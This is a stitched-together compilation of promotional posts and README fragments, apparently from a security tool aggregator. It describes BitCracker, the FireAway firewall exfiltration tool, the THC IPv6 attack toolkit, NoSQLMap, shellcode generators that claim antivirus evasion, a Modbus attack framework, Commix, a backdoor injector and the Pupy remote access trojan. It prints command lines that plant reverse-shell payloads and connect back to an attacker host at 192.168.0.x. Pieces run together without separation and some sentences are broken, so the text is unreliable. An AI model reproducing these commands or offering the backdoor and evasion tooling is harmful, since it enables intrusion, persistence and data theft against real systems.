Our attack has been tested on several memory units encrypted with BitLocker running on Windows 7, Windows 8.1 and Windows 10 (both compatible and non-compatible mode). Here we present two implementations: CUDA and OpenCL.

Requirements:
For the CUDA implementation, you need at least CUDA 7.5 and an NVIDIA GPU with compute capability 3.5 or higher (i.e. Kepler architecture).

How To
Use the build.sh script to build 3 executables:
+ hash extractor
+ BitCracker CUDA version
+ BitCracker OpenCL version
The executables are stored in the build directory.

Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls. These tactics are based on the principle that the NGFW has to allow a connection to establish before it can see any layer 7 data to filter, as well as on spoofing applications so that communication channels appear in the firewall logs as normal user traffic, such as Internet surfing.

Starting the FireAway Server: Typically the FireAway server is started on the egress side of the firewall (such as a server on the Internet) and listens on a port believed to be closed, to see whether any application-based rules allow traffic out on this port: python fa_server.py <port to listen on>

All data received by the server on this port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server detects differing sizes in the amount of data received (indicating that firewall filtering has kicked in), this is reported on the server console.

Starting the FireAway Client/Application Spoofer: The FireAway client has two modes:
* Test mode (mode 0): send random data in incrementing chunk sizes to see how much data can be sent before the firewall AppID engages and stops traffic flow.
* Exfiltration mode (mode 1): open a file and send it in chunks through the firewall.

The THC IPV6 ATTACK TOOLKIT v3.3-dev
http://seclist.us/the-thc-ipv6-attack-toolkit-v3-3-dev.html
Mon, 23 Jan 2017 22:09:51 +0000

LEGAL DISCLAIMER
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punished by law. This script was built to show how resource files can automate tasks.

INTRODUCTION
============
This code was inspired when I got in touch with IPv6, learned more and more about it – and then found no tools to play (read: “hack”) around with. First I tried to implement things with libnet, but then found out that the IPv6 implementation is only partial – and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library.

LIMITATIONS
===========
This code currently only runs on:
– Linux 2.7.x or newer (because of /proc usage)
– Ethernet
But this means for all linux guys that it will work for 98% of your use cases.
Patches are welcome! (add “antispam” in the subject line to get through my
anti-spam protection, otherwise the email will bounce)

THE TOOLS
=========
The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking tools:
– parasite6: ICMPv6 neighbor solicitation/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)
– alive6: an effective alive scanner, which will detect all systems listening to this address
– dnsdict6: parallelized DNS IPv6 dictionary bruteforcer
– fake_router6: announce yourself as a router on the network, with the highest priority
– redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer
– toobig6: mtu decreaser with the same intelligence as redir6
– detect-new-ip6: detect new IPv6 devices which join the network, you can run a script to automatically scan these systems etc.
– dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DOS).
– trace6: very fast traceroute6 which supports ICMP6 echo request and TCP-SYN
– flood_router6: flood a target with random router advertisements
– flood_advertise6: flood a target with random neighbor advertisements
– fuzz_ip6: fuzzer for IPv6
– implementation6: performs various implementation checks on IPv6
– implementation6d: listen daemon for implementation6 to check behind a FW
– fake_mld6: announce yourself in a multicast group of your choice on the net
– fake_mld26: same but for MLDv2
– fake_mldrouter6: fake MLD router messages
– fake_mipv6: steal a mobile IP to yours if IPSEC is not needed for authentication
– fake_advertiser6: announce yourself on the network
– smurf6: local smurfer
– rsmurf6: remote smurfer, known to work only against linux at the moment
– exploit6: known IPv6 vulnerabilities to test against a target
– denial6: a collection of denial-of-service tests against a target
– thcping6: sends a hand crafted ping6 packet
– sendpees6: a tool by willdamn@gmail.com, which generates neighbor solicitation requests with a lot of CGAs (crypto stuff to keep the CPU busy). Nice.
and about 25 more tools for you to discover

Just run the tools without options and they will give you help and show the command line options.

DETECTION
=========
Most tools can easily be detected by an IDS or specialized detection software. This is done on purpose to make rogue usage detection easier. The tools either specify a fixed packet signature, or generically sniff for packets (e.g. therefore also answering ICMPv6 neighbor solicitations which are sent to a non-existing MAC, and are therefore very easy to detect).

Installation :

THC-IPV6 requires the libpcap development files to be installed; the
libopenssl development files are a good idea as well.
For Debian/Ubuntu/Kali/Backtrack, you can install them by:
$ sudo apt-get install libpcap-dev libssl-dev
To compile simply type
$ make
All tools are installed to /usr/local/bin if you type
$ sudo make install
You need to be root to run most tools

NoSQLMap v0.7 – Automated Mongo database and NoSQL web application exploitation tool
http://seclist.us/nosqlmap-v0-7-automated-mongo-database-and-nosql-web-application-exploitation-tool.html
Sun, 26 Jun 2016 03:25:59 +0000

Changelog v0.7 (Maintenance Release with a couple of cool additions):
+ Web app attacks: Added the ability to specify multiple parameters for injection simultaneously; for example, trying an associative array injection attack on two parameters in the same HTTP request, like the username and password field on a logon page.
+ Bugfix: Workaround to correct issues with self-signed certificates when attacking HTTPS sites and running on Python 2.7.9 or later.
+ Bugfix: Improper formatting on timing based attack URL (trailing &).
+ General: Cleaned up Web app attack code. All moved into a freestanding Python module.

NoSQLMap v0.7

NoSQLMap is an open source Python tool designed to audit for, as well as automate, injection attacks and to exploit default configuration weaknesses in NoSQL databases and in web applications using NoSQL, in order to disclose data from the database.
It is named as a tribute to Bernardo Damele and Miroslav Stampar’s popular SQL injection tool sqlmap, and its concepts are based on and extend Ming Chow’s excellent presentation at Defcon 21, “Abusing NoSQL Databases”. Presently the tool’s exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra is planned in future releases.


Requirements
On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap’s dependencies.
Varies based on features used:
+ Metasploit Framework
+ MongoDB
+ Python with PyMongo
+ httplib2
+ urllib

[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

Codename: Final Polymorphic Stub. You can see what is a different

Komodo Venom v1.0.10

The script will use msfvenom (metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), inject the generated shellcode into one function (example: python; “the python function will execute the shellcode in RAM”), use compilers like gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file, and also start a multi-handler to receive the remote connection (reverse shell or meterpreter session).
—
The ‘shellcode generator’ tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, powersploit, etc. “P.S. some payloads are undetectable by AV solutions, yes!!!” One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target’s RAM.

smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest the Modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software runs on Linux/OSX under Python 2.7.x.


Summary
SCADA (Process Control Networks) based systems have moved from proprietary closed networks to open source solutions and TCP/IP enabled networks steadily over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.
The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:
+ modbus is still widely used in power systems.
+ modbus/TCP is simple and easy to implement.
+ modbus protocol libraries are freely available for utilities to implement smart grid applications.
You can use this tool to perform a vulnerability assessment of the Modbus protocol.

venom.sh v1.0.8 stable released – msfvenom shellcode generator/compiler/listener
http://seclist.us/venom-sh-v1-0-8-stable-released-msfvenom-shellcode-generatorcompilerlistenner.html
Sun, 17 Jan 2016 08:22:11 +0000

[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punished by law.

Version 0.2b [2015]:
+ Added: Support for recalling previous commands.
+ Added: Versions for “nongit” users (vx.xx-nongit-yyyymmdd).
+ Added: Support for a tab completion in shell options.
+ Added: Support for alternative (Python) os-shell in dynamic code evaluation (aka eval-based) technique.
+ Added: Support for PHP/Python meterpreter on “reverse_tcp” shell option.
+ Added: The “reverse_tcp” shell option.
+ Added: The ability to check for default root directories (Apache/Nginx).
+ Added: Support for removal of (txt) shell files (File-based/Tempfile-based).
+ Added: Support for JSON POST data.
+ Added: The “enumeration” and “file-read” results to log file.
+ Added: The ability to get the user’s approval before re-{enumerate/file-read} target.
+ Added: The ability to stop current injection technique and proceed on the next one(s).


Commix (short for [com]mand [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.

The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub-processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’. NetCraft results are presented individually and are then compared to the brute force results; any duplicates are removed and particularly interesting results are highlighted.

Bluto v1.1.6
Bluto is attempting to brute force the target domain.
This tool has been tested on Ubuntu, Arch Linux, Debian and Kali 2.0.

Pupy is a remote administration tool with an embedded Python interpreter
http://seclist.us/pupy-is-a-remote-administration-tool-with-an-embeded-python-interpreter.html
Tue, 22 Sep 2015 11:05:24 +0000

Pupy is an open source RAT (Remote Administration Tool) written in Python. Pupy uses reflective DLL injection and leaves no traces on disk.

Features:
+ On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk
+ Pupy can reflectively migrate into other processes
+ Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
+ modules are quite simple to write and pupy is easily extensible.
+ Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
— we can also access remote objects interactively from the pupy shell, and even auto-completion of remote attributes works!
+ the communication channel currently works as an SSL reverse connection, but a bind payload will be implemented in the future
+ all the non interactive modules can be dispatched on multiple hosts in one command
+ Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
+ modules can be executed as background jobs
+ commands and scripts running on remote hosts are interruptible
+ auto-completion and nice colored output
+ commands aliases can be defined in the config


Quick start
In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload
for Windows:

./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

for MAC OS X:

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for Linux:

easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443